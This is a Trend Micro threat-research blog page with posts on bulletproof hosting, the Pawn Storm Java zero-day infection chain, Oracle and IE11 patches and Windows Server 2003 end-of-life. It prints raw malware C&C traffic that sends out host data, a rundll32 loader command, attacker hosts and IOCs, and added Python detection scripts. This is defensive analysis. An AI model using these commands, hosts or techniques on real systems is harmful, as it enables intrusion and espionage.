Trend Micro TrendLabs Malware Blog
    What do LeaseWeb, Galkahost, and Spamz have in common? All of them, at one point or another, have functioned as cybercriminal hideouts in the form of bulletproof hosting services (BPHS).

    Simply put, BPHS is any “hosting facility that can store any type of malicious content like phishing sites, pornography, and command-and-control (C&C) infrastructure.” If I were to compare them with real-life crime rings, BPHS would be those hideouts criminals use to perform their illegal activities in private. In the context of cybercrime, it is very common to belittle the role of BPHSs in cybercriminal operations and instead focus on revealing the bad guys’ identities or discussing their modus operandi. But the truth is: BPHSs are crucial. They are so crucial, in fact, that many major cybercriminal groups would not be able to operate without them.

    So why not just shut them down? Well, the thing with BPHS takedowns is that they are easier said than done.

    In my paper, “Criminal Hideouts for Lease: Bulletproof Hosting Services”, I cite several factors that make BPHSs an imposing challenge for security and law enforcement organizations. For one, many BPHS providers operate under the guise of legitimate and legal hosting providers. This makes tracking them a lot trickier.

    Running BPHS as a Business

    BPHS providers usually choose one of three business models when building their services, as follows:

    • Model 1: Dedicated bulletproof servers
      BPHS providers create a convincing business front to avoid suspicion from law enforcement. They usually cater to customers who need to host content that may be considered illegal in certain countries.
    • Model 2: Compromised dedicated servers
      BPHS providers choose to compromise dedicated servers and rent these out to parties who wish to host malicious content.
    • Model 3: Abused cloud-hosting services
      Cybercriminals abuse cloud-hosting services like Amazon Web Services (AWS), Hetzner, OVH, and LeaseWeb to host C&C servers or drop stolen data, among other malicious purposes.

    It is important for these BPHS providers to be able to retain their name or domain for a long time to show how adept they are in keeping customers’ activities confidential, particularly from security researchers and law enforcers. Longtime providers are usually kept afloat by their capability to provide immediate technical support, quickly migrate in case they’re blacklisted, protect from DDoS attacks, and advertise cleverly to reach their specific clientele.

    Figure 1. Sample of a BPHS provider with expensive offerings

    Pricing for BPHSs depends on the risk involved in hosting certain content. Providers in several countries offer as low as US$2 per month for low-risk content, while servers based in China, Bolivia, Iran, and Ukraine can go as high as US$300 per month for critical infrastructure projects or high-risk content. (You can find a more detailed description of the risk ratings or the toxicity of BPHS servers in the paper.)

    Takedown Impossible

    Another challenge for security and law enforcement organizations is the fact that these services operate in locations that do not heavily police cybercrime. BPHSs are often based in countries with lax regulations and weak laws against cybercriminal activity.

    We looked at several BPHS providers in different countries and noted the types of malicious content they frequently host. Do note that this list is not exhaustive. There are many more bulletproof hosts that operate in other countries not cited here.

    Figure 2. Malicious content found in BPHS servers in certain countries

    My FTR colleague, Bob McArdle, sums up the challenges BPHSs pose pretty well: “The very nature of BPHSs is that they protect malicious activity against law enforcement, giving cybercriminals the much-needed loophole to wriggle out of and escape from the clutches of both law enforcement and the security industry. That loophole unfortunately largely remains open today.”

    The paper contains more insights on BPHSs as well as a system for classifying them to help my fellow security researchers and law enforcement agencies in their own investigations.

    Click on the thumbnail below to read the paper “Criminal Hideouts for Lease: Bulletproof Hosting Services.”


    Operation Pawn Storm is a campaign known to target military, embassy, and defense contractor personnel from the United States and its allies. The attackers behind Operation Pawn Storm have been active since at least 2007 and they continue to launch new campaigns.

    Over the past year or so, we have seen numerous techniques and tactics employed by this campaign, such as the use of an iOS espionage app, and the inclusion of new targets like the White House. Through our on-going investigation and monitoring of this targeted attack campaign, we found suspicious URLs that hosted a newly discovered zero-day exploit in Java now identified by Oracle as CVE-2015-2590. This is the first time in nearly two years that a new Java zero-day vulnerability was reported.

    The report below outlines the traffic observed as part of the attack, not the exploit itself. Our blog entry on how the exploit works can be found here. This entry is intended to help readers identify traffic in their network that would indicate such an exposure has occurred. We strongly recommend that all readers roll out the Oracle patch as soon as possible.

    Infection sequence

    Trend Micro has observed that an entity belonging to the target profile received an email that contains the following URL:

    • hxxp://ausameetings[.]com/url?={BLOCKED}/2015annualmeeting/

    It is worth noting that the spearphishing domain used is ausameetings[.]com, a play on the valid domain “ausameetings.org,” which is a site for AUSA’s (Association of the United States Army) annual exposition, commonly held in mid-October. The domain was only registered last July 8, which implies a one-time use for a specific set of targets.

    When assessing this URL, it was determined that the most probable infection sequence is:

    Figure 1. Infection chain

    Like all multi-stage infections, a successful execution of the previous stage is required before moving to the next stage down. In Stage 1, the sequence is initiated by clicking on the URL embedded within the victim’s spearphishing email.

    Once the Java exploit of Stage 1 is successful, it downloads the PE file (Stage 2). Once the PE file is downloaded and executed it drops and runs the DLL file (Stage 3) which is the final component to infect the machine with SEDNIT.

    The information that we have on each of these stages is summarized below; further details on each stage follow in the sections after the table.

    Stage 1 – Java exploit
      SHA1: 95dc765700f5af406883d07f165011d2ff8dd0fb
      File name: served from a spearphishing URL matching hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/
      Trend Micro detection: JAVA_DLOADR.EFD

    Stage 2 – PE file
      SHA1: b4a515ef9de037f18d96b9b0e48271180f5725b7
      File name: downloaded as cormac.mcr; ends up on the host as vhgg5hkvn25.exe
      File size: 1,619,968 bytes
      Trend Micro detection: TROJ_DROPPR.CXC

    Stage 3 – DLL
      SHA1: 21835aafe6d46840bb697e8b0d4aac06dec44f5b
      File name: api-ms-win-downlevel-profile-l1-1-0.dll
      File size: 40,960 bytes
      Trend Micro detection: TSPY_SEDNIT.C

    Stage 1 – the Java exploit

    The first stage of the infection sequence comes through a targeted, spearphishing attempt against the victim, which is the observed method for Operation Pawn Storm attacks.

    The initial spearphishing URL is constructed similar to:

    • hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/

    The web pages on this domain that were found to drop the Java zero-day exploit include:

    • 1_2015annualmeeting index.htm (19,225 bytes) – detected as HTML_JNLPER.HAQ
    • 3_544306 index.htm (4,077 bytes) – detected as HTML_JNLPER.HAQ

    The network traffic observed for the infection sequence of this stage is:

    1. Send the initial POST as per the spearphishing email to ausameetings[.]com, which includes the 2015annualmeeting URI path.
    2. Send an encoded POST call which, when decoded, yields the variable used to construct the subsequently used URI path. This is particularly interesting, as it appears that each URI path on the malicious server is customized per victim infection rather than being static on the web server.
    3. The victim machine then makes a series of GET calls to pull down JPG, JNLP, and Java class files.
    4. If the Java class files cannot be found on the primary domain (ausameetings[.]com), it instead appears to fetch them from a hardcoded IP (87[.]236[.]215[.]132).
    5. Once the class files are downloaded, the victim machine makes a GET call to fetch the file cormac.mcr. This file is the PE file for Stage 2.

    For completeness, the specific traffic calls observed relating to Stage 1 include the following:

    Result  Protocol  Host                  URL                                                  Size        Content-Type
    200     HTTP      ausameetings[.]com    /url?={BLOCKED}/2015annualmeeting/                   19,225      text/html; charset=utf-8
    200     HTTP      ausameetings[.]com    /VFlmsRH/7311/4388/558923/?p2=KlW2HlMf&c=BMjNiBV&recr=Wr1mI7&p3=364397021&as=SAUmj&c=GY9oCdQ&
                                                                                                 22          text/html; charset=utf-8
    200     HTTP      ausameetings[.]com    /url/544036/                                         4,077       text/html; charset=utf-8
    200     HTTP      ausameetings[.]com    /url/544036/line.jpg                                 22,500      text/html; charset=utf-8
    200     HTTP      ausameetings[.]com    /url/544036/right.jpg                                97,247      text/html; charset=utf-8
    200     HTTP      ausameetings[.]com    /url/544036/init.jnlp                                562         application/x-java-jnlp-file
    200     HTTP      ausameetings[.]com    /url/544036/                                         4,077       text/html; charset=utf-8
    200     HTTP      ausameetings[.]com    /url/544036/jndi.properties                          125         text/html; charset=utf-8
    404     HTTP      ausameetings[.]com    /url/544036/Go.class                                 0           text/html; charset=utf-8
    200     HTTP      87[.]236[.]215[.]132  /2/Go.class                                          1,373       text/html; charset=utf-8
    404     HTTP      87[.]236[.]215[.]132  /crossdomain.xml                                     0           text/html; charset=utf-8
    200     HTTP      87[.]236[.]215[.]132  /2/App.class                                         7,552       text/html; charset=utf-8
    200     HTTP      87[.]236[.]215[.]132  /2/Help.class                                        5,667       text/html; charset=utf-8
    200     HTTP      87[.]236[.]215[.]132  /2/PhantomSuper.class                                763         text/html; charset=utf-8
    200     HTTP      87[.]236[.]215[.]132  /2/ArrayReplace.class                                729         text/html; charset=utf-8
    200     HTTP      87[.]236[.]215[.]132  /2/App$PassHandleController.class                    980         text/html; charset=utf-8
    200     HTTP      87[.]236[.]215[.]132  /2/Converter.class                                   2,820       text/html; charset=utf-8
    200     HTTP      87[.]236[.]215[.]132  /2/MyByteArrayInputStream.class                      1,282       text/html; charset=utf-8
    404     HTTP      87[.]236[.]215[.]132  /2/pkg/None2.class                                   0           text/html; charset=utf-8
    404     HTTP      87[.]236[.]215[.]132  /2/pkg/None.class                                    0           text/html; charset=utf-8
    200     HTTP      ausameetings[.]com    /url/544036/cormac.mcr                               1,619,968   application/octet-stream

    Trend Micro detects these Java class files as JAVA_DLOADR.EFD:

    • App.class (7,552 bytes)
    • Go.class (1,373 bytes)
    • Help.class (5,667 bytes)

    The second and third traffic calls in the traffic pattern are particularly interesting to note.


    Figure 2. Traffic patterns (click the image to enlarge)

    One can observe that the second call sends a POST to ausameetings[.]com and is returned a short text response that is then used as the URI path for the subsequent HTTP requests.

    Stage 2 – The PE file

    Stage 2 involves downloading a PE file. Trend Micro detects this file as TROJ_DROPPR.CXC. The primary purpose of this PE is to drop and load the DLL. It is downloaded as cormac.mcr, but once extracted, the file is given a randomized name. It is installed into the %USERPROFILE% directory and then executed, creating a service of the same name.

    During its installation, a variety of other processes also appear to be hooked, including lsass, lsm, and conhost, amongst others.


    Figure 3. Observed processes (click the image to enlarge)

    Once the malware is executed, it will drop the Stage 3 DLL file with filename api-ms-win-downlevel-profile-l1-1-0.dll in the %TEMP% directory. To load the malware, it executes rundll32.exe using the following command:

    • rundll32.exe “%temp%/api-ms-win-downlevel-profile-l1-1-0.dll”,init

    Stage 3 – The DLL file

    This third stage involves a DLL file, which we detect as TSPY_SEDNIT.C. When the PE file loads the DLL through rundll32 (in this instance, the command line was “%windir%\system32\RunDll32.exe” “C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\api-ms-win-downlevel-profile-l1-1-0.dll”,init), the following traffic was observed.

    1. POST /ESL/YxF8bM/f/MFS.pdf/?duJ=OJYKZRlzy1tddcpaKjU= HTTP/1.1
       Content-Type: application/x-www-form-urlencoded
       Host: www.google.com
       Content-Length: 0
       (Assumed to be a local connectivity test.)

    2. POST /RGLw/ofEK/5w2a.htm/?6=9SpyZtTPs1iQybJZ54k= HTTP/1.1
       Content-Type: application/x-www-form-urlencoded
       Host: 192[.]111[.]146[.]185
       Content-Length: 830

    3. POST /hP/Bo/S/2z.htm/?WDC=TJrXZm1/FlgpeRdZXjk= HTTP/1.1
       Content-Type: application/x-www-form-urlencoded
       Host: www.google.com
       Content-Length: 0
       (Assumed to be a local connectivity test.)

    4. POST /C9zl/LJ9.zip/?hP=mLgAZ7ldwVn9W8BYihs= HTTP/1.1
       Content-Type: application/x-www-form-urlencoded
       Host: 192[.]111[.]146[.]185
       Content-Length: 0

    5. POST /k9/eR3/a/UE/eR.pdf/?bKC=xCCmnuXFZ6Chw2ah1oM= HTTP/1.1
       Content-Type: application/x-www-form-urlencoded
       Host: 192[.]111[.]146[.]185
       Content-Length: 26

    It bears stressing that we do not encourage using the URI paths presented above as IOCs for your own analysis. The network traffic generated by this stage was a challenge to assess, as the malware appears to have polymorphic capabilities in creating the URI paths it uses to pull down files. After assessing the samples multiple times, each network traffic infection sequence appeared to be different, no matter what sequence of testing was performed (e.g., same machine, different machines, different geographic IP space globally, etc.).

    After detailed network forensics of the traffic, it was determined that no single stable URL path or URI query component (URI path component, file name, or URI query parameter) showed a consistent pattern (neither an identical entry nor a regex-definable one), and further reverse engineering was required to determine the method used to achieve this.

    As a result of this additional analysis, it was determined that the URI path is a randomly generated string with the following pattern:

    • ^/([a-zA-Z0-9]{1,6}/){1,5}[a-zA-Z0-9]{1,7}\.(xml|pdf|htm|zip)/\?[a-zA-Z0-9]{1,3}=<Encoded ID>

    Figure 4. Regex expression
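    As an added example (not code from the original post), the pattern above applied to the five request heads listed earlier. The only assumption is how the <Encoded ID> placeholder is spelled out: every observed value uses the Base64 alphabet plus “=” padding, so that character class is used. The classifier deliberately refuses to treat the path pattern alone as a hit; it only reports a request when the path matches and the destination is one of the C&C hosts named in this post, or when it is the Content-Length: 0 POST to www.google.com that the post reads as a connectivity check.

```python
import re

# The URI pattern from the post, with its <Encoded ID> placeholder filled by
# a Base64 character class (assumption: the post does not define the
# placeholder, but every observed ID uses the Base64 alphabet plus '=' padding).
SEDNIT_URI_RE = re.compile(
    r"^/(?:[a-zA-Z0-9]{1,6}/){1,5}"                  # 1-5 random directory components
    r"[a-zA-Z0-9]{1,7}\.(?:xml|pdf|htm|zip)/"        # random file name and extension
    r"\?[a-zA-Z0-9]{1,3}=(?P<id>[A-Za-z0-9+/=]+)$"   # 1-3 char key, then the encoded ID
)

# C&C hosts named in the post (direct-to-IP call plus the two domains).
SEDNIT_C2_HOSTS = {"192.111.146.185", "www.acledit.com", "www.biocpl.org"}


def parse_request(raw):
    """Split a raw HTTP request head into (method, uri, headers-dict)."""
    lines = raw.strip().splitlines()
    method, uri, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, uri, headers


def classify(raw):
    """Classify one request: 'beacon', 'connectivity-check', 'uri-only' or None.

    The path regex alone is not a hit: the post notes the paths are regenerated
    per infection, so the pattern is only useful when paired with a destination
    that is itself suspicious.
    """
    method, uri, headers = parse_request(raw)
    if method != "POST" or SEDNIT_URI_RE.match(uri) is None:
        return None
    host = headers.get("host", "").lower()
    length = int(headers.get("content-length", "0"))
    if host in SEDNIT_C2_HOSTS:
        return "beacon"
    if host == "www.google.com" and length == 0:
        return "connectivity-check"   # the post's reading of the Google POSTs
    return "uri-only"


def encoded_id(raw):
    """Return the <Encoded ID> query value of a matching request, else None."""
    _method, uri, _headers = parse_request(raw)
    m = SEDNIT_URI_RE.match(uri)
    return m.group("id") if m else None


# The five request heads observed in the post (defanging removed so they parse).
OBSERVED = [
    "POST /ESL/YxF8bM/f/MFS.pdf/?duJ=OJYKZRlzy1tddcpaKjU= HTTP/1.1\n"
    "Content-Type: application/x-www-form-urlencoded\nHost: www.google.com\nContent-Length: 0",
    "POST /RGLw/ofEK/5w2a.htm/?6=9SpyZtTPs1iQybJZ54k= HTTP/1.1\n"
    "Content-Type: application/x-www-form-urlencoded\nHost: 192.111.146.185\nContent-Length: 830",
    "POST /hP/Bo/S/2z.htm/?WDC=TJrXZm1/FlgpeRdZXjk= HTTP/1.1\n"
    "Content-Type: application/x-www-form-urlencoded\nHost: www.google.com\nContent-Length: 0",
    "POST /C9zl/LJ9.zip/?hP=mLgAZ7ldwVn9W8BYihs= HTTP/1.1\n"
    "Content-Type: application/x-www-form-urlencoded\nHost: 192.111.146.185\nContent-Length: 0",
    "POST /k9/eR3/a/UE/eR.pdf/?bKC=xCCmnuXFZ6Chw2ah1oM= HTTP/1.1\n"
    "Content-Type: application/x-www-form-urlencoded\nHost: 192.111.146.185\nContent-Length: 26",
]

# A constructed benign request: the same shape of path, but an unrelated host.
BENIGN = ("POST /api/v2/reports.pdf/?id=abc123 HTTP/1.1\n"
          "Host: reports.example.org\nContent-Length: 12")

if __name__ == "__main__":
    for raw in OBSERVED + [BENIGN]:
        print(classify(raw), encoded_id(raw), raw.splitlines()[0])
```

    The constructed benign request shows why the regex must not be used on its own: a perfectly ordinary REST path matches it and comes back as “uri-only”, which is the level the post warns against alerting on.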

    Included in the POST request is data encoded with Base64 and XOR encryption. The encoded data contains the following system information about the infected machine:

    • OS Version
    • List of running processes
    • Hard Disk Drive Information
    • Volume Serial Number

    TSPY_SEDNIT.C connects to three C&C servers:

    • 192[.]111[.]146[.]185 (direct to IP call)
    • www[.]acledit[.]com
    • www[.]biocpl[.]org

    After sending the encrypted data it will wait for a reply which is encrypted by the same algorithm above.

    Phase 2 of the attack: the keystroke logger

    Based on our investigation of Operation Pawn Storm, we know that the infection happens in two phases:

    • In phase 1, opening the email attachment or clicking on the malicious URI initiates the download of the first-level dropper, which installs the downloader component (.DLL file).
    • In phase 2, the downloader component communicates with a C&C server and downloads other components; at the end of the chain a keylogger is installed. The keylogger sends data back to the C&C server.

    As of writing, we have not succeeded in triggering Phase 2, which will download a fourth stage malware from the C&C servers. This fourth stage malware is expected to be an encrypted executable file.

    Victims of the Attack

    A number of victims were identified during the course of our investigation. The targets are in the United States or Canada, and those we were able to identify via IP are big defense contractors, as is typical for Operation Pawn Storm.

    Countermeasures

    Trend Micro is already able to protect users against this threat without any necessary updates. The existing Sandbox with Script Analyzer engine, which is part of Trend Micro™ Deep Discovery, can be used to detect this threat by its behavior. The Browser Exploit Prevention feature in the Endpoint Security in Trend Micro™ Smart Protection Suite detects the exploit once the user accesses the URL that hosts it. Browser Exploit Prevention protects user systems against exploits targeting browsers or related plugins.

    Vulnerability protection in Trend Micro Deep Security protects user systems from threats that may leverage this vulnerability with the following DPI rule:

    • 1006857 – Oracle Java SE Remote Code Execution Vulnerability

    Oracle has also provided a security patch for the related vulnerability.

    Indicators of Compromise

    The following table summarizes the identified stable IOCs that can be used to search for this attack. The “Precision” column indicates how specific the indicator is to this attack; the lower the precision, the higher the likelihood of collateral false positives.

    Stage                           Type               Indicator                        Precision
    Infection Sequence – Stage 1    Domain             ausameetings[.]com               High
    Infection Sequence – Stage 1    Domain_IP          95[.]215[.]45[.]189              Low
    Infection Sequence – Stage 1    IP                 87[.]236[.]215[.]132             High
    Infection Sequence – Stage 1    URIPath_FileName   ArrayReplace.class               Medium
    Infection Sequence – Stage 1    URIPath_FileName   App$PassHandleController.class   Medium
    Infection Sequence – Stage 1    URIPath_FileName   Converter.class                  Medium
    Infection Sequence – Stage 1    URIPath_FileName   MyByteArrayInputStream.class     Medium
    Infection Sequence – Stage 1    URIPath_FileName   None2.class                      Medium
    Infection Sequence – Stage 1    URIPath_FileName   None.class                       Medium
    Infection Sequence – Stage 1->2 URIPath_FileName   cormac.mcr                       High
    Infection Sequence – Stage 3    IP                 192[.]111[.]146[.]185            High
    Infection Sequence – Stage 3    IP_DirectCall      37[.]187[.]116[.]240             High
    Infection Sequence – Stage 3    Domain             www[.]acledit[.]com              High
    Infection Sequence – Stage 3    Domain             www[.]biocpl[.]org               High
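    As an added example (not part of the original post), the IOC table above turned into a proxy-log sweep that ranks each client by the best precision it hit, so that a Medium-only client (a generic class-file name such as Converter.class from an unrelated host) is queued for review rather than declared compromised. The log format is an assumption (“timestamp client method url status”), and the log lines are constructed for the example; the indicators and precision ratings are the ones in the table.

```python
import re
from collections import defaultdict

# The IOC table from the post. Hosts (domains and IPs) are matched against the
# request host, file names against the last component of the URI path.
IOCS = [
    ("host", "ausameetings.com", "High"),
    ("host", "95.215.45.189", "Low"),          # the domain's IP, rated Low in the post
    ("host", "87.236.215.132", "High"),
    ("file", "ArrayReplace.class", "Medium"),
    ("file", "App$PassHandleController.class", "Medium"),
    ("file", "Converter.class", "Medium"),
    ("file", "MyByteArrayInputStream.class", "Medium"),
    ("file", "None2.class", "Medium"),
    ("file", "None.class", "Medium"),
    ("file", "cormac.mcr", "High"),
    ("host", "192.111.146.185", "High"),
    ("host", "37.187.116.240", "High"),
    ("host", "www.acledit.com", "High"),
    ("host", "www.biocpl.org", "High"),
]
RANK = {"Low": 1, "Medium": 2, "High": 3}

# Assumed proxy log format: "<timestamp> <client-ip> <method> <url> <status>".
LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")
URL_RE = re.compile(r"^https?://([^/:?#]+)(?::\d+)?(/[^?#]*)?")


def iocs_in_line(line):
    """Return (client, indicator, precision) for every IOC the line matches."""
    m = LOG_RE.match(line)
    if not m:
        return []
    _ts, client, _method, url, _status = m.groups()
    u = URL_RE.match(url)
    if not u:
        return []
    host = u.group(1).lower()
    path = u.group(2) or "/"
    fname = path.rsplit("/", 1)[-1]          # last path component only
    hits = []
    for kind, value, precision in IOCS:
        if (kind == "host" and host == value) or (kind == "file" and fname == value):
            hits.append((client, value, precision))
    return hits


def triage(lines):
    """Group hits per client and keep the highest precision seen for that client."""
    report = defaultdict(lambda: {"precision": None, "hits": []})
    for line in lines:
        for client, value, precision in iocs_in_line(line):
            entry = report[client]
            entry["hits"].append((value, precision))
            if entry["precision"] is None or RANK[precision] > RANK[entry["precision"]]:
                entry["precision"] = precision
    return dict(report)


# Constructed sample log: one client walking the Stage 1 chain, one client that
# only fetches a generic-looking class-file name, and one clean client.
SAMPLE_LOG = [
    "2015-07-09T10:01:12Z 10.1.2.3 GET http://ausameetings.com/url/544036/init.jnlp 200",
    "2015-07-09T10:01:13Z 10.1.2.3 GET http://87.236.215.132/2/Converter.class 200",
    "2015-07-09T10:01:20Z 10.1.2.3 GET http://ausameetings.com/url/544036/cormac.mcr 200",
    "2015-07-09T10:05:44Z 10.1.2.9 GET http://cdn.example.org/static/Converter.class 200",
    "2015-07-09T10:07:02Z 10.1.2.7 GET http://www.example.com/index.html 200",
]

if __name__ == "__main__":
    for client, entry in sorted(triage(SAMPLE_LOG).items()):
        print(client, entry["precision"], entry["hits"])
```

    Hosts are compared case-insensitively and file names case-sensitively, since the class names in the table (App$PassHandleController.class) are exact Java class-file names; a real deployment would swap the constructed log lines for a proxy export in the same five-field shape.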

    Other posts related to Operation Pawn Storm can be found here:

    Updated on July 15, 2015, 9:57AM PDT (UTC-7) to include revised detection name for DLL file and clarifications to the infection flow.

    Updated on July 15, 2015, 1:15PM PDT (UTC-7) to include more details about the infection flow.

    Updated on July 16, 2015 1:36PM PDT (UTC-7) to include screenshots of running processes.


    Oracle has released its Critical Patch Update for the month of July. The update provides fixes for 193 new security vulnerabilities, including the recently announced zero-day vulnerability first reported by Trend Micro researchers. What makes the zero-day discovery more notable is that it is being used in an ongoing targeted attack campaign, Operation Pawn Storm. This particular vulnerability was designated as CVE-2015-2590.

    Trend Micro first came across this vulnerability (and exploit) as part of our ongoing investigations on Operation Pawn Storm. We found email messages targeting the armed forces of a NATO country and a US defense organization that contained the malicious URLs where the Java exploit is hosted. This exploit sets off a chain of malware infections that leads to its final payload: an information-stealing malware.

    More details about the connections between Pawn Storm and this vulnerability will be made available in an upcoming blog entry.

    We recommend users install the latest security fix from Java immediately.

    Trend Micro is already able to protect users against exploits targeting this vulnerability without any necessary updates. The existing Sandbox with Script Analyzer engine, which is part of Trend Micro™ Deep Discovery, can be used to detect this threat by its behavior. The Browser Exploit Prevention feature in the Endpoint Security in Trend Micro™ Smart Protection Suite detects the exploit once the user accesses the URL that hosts it. Browser Exploit Prevention protects user systems against exploits targeting browsers or related plugins.

    Vulnerability protection in Trend Micro Deep Security protects user systems from threats that may leverage this vulnerability with the following DPI rule:

    • 1006857 – Oracle Java SE Remote Code Execution Vulnerability

    The hits keep on coming from the Hacking Team. After three separate Adobe Flash zero-days, another vulnerability that could take over user systems has been found. Our latest discovery is in Internet Explorer, and has been acknowledged by Microsoft and patched as part of the regular Patch Tuesday cycle as MS15-065. It has been designated as CVE-2015-2425. While we did find proof-of-concept (POC) code, there are still no known attacks exploiting this vulnerability.

    Vulnerability Information

    This zero-day vulnerability is a just-in-time (JIT) function UAF (use-after-free) vulnerability in jscript9.dll, specifically in the MutationObserver object. It occurs when MutationObserver tries to keep track of an element that has already been destroyed. Only Internet Explorer 11 is affected, as older versions of the browser do not support this feature.

    The POC code we found confirms that an exploit can crash Internet Explorer 11 every time it is loaded. The crash point is at JMP EAX, where the value of EAX is an invalid heap address whose memory property is MEM_RESERVE, and this heap address was a JIT function address before it was freed. Internet Explorer 11 crashes as seen below; the EIP value is the same as EAX.

    Figure 1. Internet Explorer crash

    The function in jscript9.dll where the crash occurs is shown in the following picture:

    Figure 2. Function where jscript9.dll crashes

    Is it exploitable?

    Microsoft has confirmed that this particular vulnerability is exploitable.

    An ideal attack would use a heap spray to occupy the freed memory before it is used. However, because the freed memory is JIT memory and the freed memory is reserved by the heap for JIT generation, a normal heap spray is not possible. But a JIT spray can occupy this kind of memory, so JIT spray may be used to spray shellcode into the freed memory location. If the JMP EAX instruction jumps into the sprayed shellcode, this shellcode will be run within the context of the IE tab process.

    Simply put, if an attacker successfully exploits the vulnerability, he can basically run any code on the system. The extent of the attacker’s advances, though, is dependent on the OS version. On Windows 7, the IE11 tab process has the same privilege as the IE11 frame process. The shellcode will be run with the same privileges as the logged in user. On Windows 8.1 and later, the privilege of IE11 tab process is low by default. A successful attack would require a separate privilege escalation vulnerability.

    Conclusion

    The Hacking Team data has been available to the public, and therefore to attackers, for just over a week. We suggest that users running a vulnerable version of Internet Explorer 11 update to a patched version immediately; a patch has been made available as part of this month’s Patch Tuesday cycle.

    While only POC code exists, the vulnerability is still exploitable. We are monitoring for possible threats or attacks that target this vulnerability. We will update this post if any attacks are found in the wild.


    End-of-life fun times are coming to infosec departments everywhere—again.

    Just a year after the announcement of Windows XP’s end-of-life, we see another body in the OS graveyard: Windows Server 2003. After July 14th, servers running this venerable OS will no longer be receiving any more security updates. This would leave you out in the cold pretty soon, given the speed that new vulnerabilities are being published lately.

    Who’d want to be in such a position? According to a survey conducted by Spiceworks, 37% of the companies surveyed hadn’t migrated to a newer OS. Looking further into this statistic reveals a scarier side: of those companies, 8% had no plans to migrate at all and 1% did not know anything about plans for migration. The majority of the companies (48%) were partially migrated; only 15% have fully migrated.

    From those companies which were looking to finish their transitions, 25% planned to finish it at some point after July 14th. This includes another group that planned to complete their migration “at some point.” From a security standpoint, these are not the answers we were hoping for.

    The most common reason given for delaying migration was that “the system is still working or there’s no immediate need to migrate.” But organizations need to wake up to the fact that most attackers are not interested in their companies per se (although some of them probably are). Most cyber attackers try to get the lowest-hanging fruit by means of the least effort massive attacks, and guess what? Your fruit will be hanging much lower if you still have an ancient, out-of-support OS after July 14th. Our primer, Pulling the Plug on Windows Server 2003: Can You Still Manage Your Legacy Systems?, discusses the risks of discontinued support.

    Unlike migrating from Windows XP, migrating from Windows Server 2003 can be more challenging because we’re talking about servers this time, which means computers that cannot easily be rebooted or turned off (let alone be down for a significant amount of upgrade time). Old server-side applications might not have been tested with more modern operating systems, and an upgrade might not be possible at all. However, we do recommend upgrading or moving to a virtual environment whenever it’s possible.

    The survey also had some bright spots. A significant percentage of those migrations would go to virtualized environments, which are easier to defend. The added layer, the hypervisor that sits beneath the guest OS, can act as a moat against threats.

    So do we encourage companies to accelerate the rate of their migrations to newer server OSs? Yes, definitely! Would you want to be exposed to the new vulnerability of the day? We bet it will come shortly after July 15th. If you have trouble sticking to that timeline, sort those problems out as soon as possible. If the survey is any indication, most companies already have the licenses/cloud providers lined up; most mention it’s a matter of time or budget constraints. This is the classical security conundrum: more security, or more convenience/cheaper/faster things? Bear in mind that convenience/price/speed can be quickly offset by a bad breach or attack. In my opinion, the decision is crystal clear.

    The Vulnerability Protection in our Smart Protection Suites can provide defense against exploits, although we still strongly recommend migration to minimize the attack surface. Companies worried about the costs and operational issues when it comes to emergency patches and system downtime can get immediate protection with the help of virtual patching technologies, such as the solutions found in Trend Micro Deep Security. Virtual patching minimizes exposure gaps, protecting users of Windows Server 2003 from exploits as they migrate to a newer platform.

    Read more about how virtual patching helps companies dodge compromise in our infographic, “Dodging a Compromise: A Peek at Exposure Gaps.”




     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice